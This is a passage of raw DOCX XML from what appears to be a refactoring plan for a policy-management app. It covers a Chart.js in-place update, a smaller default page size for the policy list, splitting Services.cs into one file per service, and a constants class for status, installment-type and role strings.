      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// BEFORE — destroys and recreates chart on every data change:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">if (this.chart) this.chart.destroy();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">this.chart = new Chart(ctx, config);</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AFTER — update data in place (no flicker, no memory alloc):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">private updateChart(): void {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!this.chart) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        this.createChart();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        return;</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this.chart.data.labels = this.forecasts.map(f =&gt; f.month);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    this.chart.data.datasets[0].data = this.forecasts.map(f =&gt; f.totalAmount);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    this.chart.update("active");   // "active" = animated update</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec2-6" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2.6  Frontend — Policy List Default Page Size</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">File: policy-list.component.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// BEFORE:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">filter: PolicyFilter = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    pageSize: 100,   // Loads 100 rows on every navigation — slow on mobile</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AFTER:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">filter: PolicyFilter = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    pageSize: 20,    // Reasonable default; user can change to 50/100/200</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Also add virtual scrolling for large datasets — add to module imports:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// ScrollingModule from @angular/cdk/scrolling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec3" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E1B4B"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 3 — Code Quality Refactoring</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">These changes improve long-term maintainability, testability, and developer experience. They are targeted for Sprint 1–2 alongside security fixes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec3-1" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1  Split Services.cs into Individual Files</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Services.cs contains 1,100+ lines and 8 distinct service classes in a single file. This makes Git diffs enormous, causes merge conflicts, and violates the Single Responsibility Principle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">New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160"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">New File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Contains</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Approx. Lines</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Services/AuthService.cs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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IAuthService, AuthService</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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~80</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Services/PolicyService.cs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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IPolicyService, PolicyService</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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~500</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Services/PolicyTypeService.cs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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IPolicyTypeService, PolicyTypeService</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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~60</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Services/DashboardService.cs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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IDashboardService, DashboardService</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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~200</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Services/FamilyMemberService.cs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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IFamilyMemberService, FamilyMemberService</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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~150</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Services/AuditLogService.cs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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IAuditLogService, AuditLogService</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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~60</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Services/ReminderService.cs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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IReminderService, ReminderService</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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~120</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Services/EmailService.cs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Already separate — no change needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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Existing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="0D9488" w:sz="16"/>
        </w:pBdr>
        <w:shd w:fill="ECFDF5" w:val="clear"/>
        <w:spacing w:after="100" w:before="100"/>
        <w:ind w:left="360" w:right="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Each file should have its own namespace declaration at the top: namespace PolicyManager.API.Services;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec3-2" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2  PolicyConstants.cs — Eliminate Magic Strings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">New File: PolicyManager.API/Constants/PolicyConstants.cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">namespace PolicyManager.API.Constants;</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public static class PolicyConstants</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    public static class Status</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public const string Active    = "Active";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        public const string Expired   = "Expired";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        public const string Pending   = "Pending";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        public const string Cancelled = "Cancelled";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        public const string Completed = "Completed";</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public static class InstallmentType</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public const string OneTime    = "One Time";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        public const string Monthly    = "Monthly";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        public const string Quarterly  = "Quarterly";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        public const string HalfYearly = "Half-Yearly";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        public const string Yearly     = "Yearly";</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public static class UserRole</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public const string Admin = "Admin";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        public const string User  = "User";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
